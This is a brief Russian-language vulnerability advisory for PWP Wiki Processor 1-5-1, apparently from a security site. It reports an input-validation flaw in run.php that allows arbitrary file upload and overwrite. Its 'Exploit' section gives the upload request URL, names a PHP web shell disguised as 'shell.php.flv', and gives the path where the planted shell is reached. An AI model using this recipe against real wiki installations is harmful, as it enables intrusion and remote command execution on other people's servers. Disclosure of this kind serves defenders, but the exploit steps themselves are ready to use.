Программа: PWP Wiki Processor 1-5-1

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных сценарием
run.php. Атакующий может загрузить произвольные файлы на целевую систему.

Эксплоит:

www.site..com/path/wiki/run.php?iRequest=upload/UploadList

(upload shell.php.flv)

shell: www.site.com/path/wiki/upload/shell.php.flv



Оставить мнение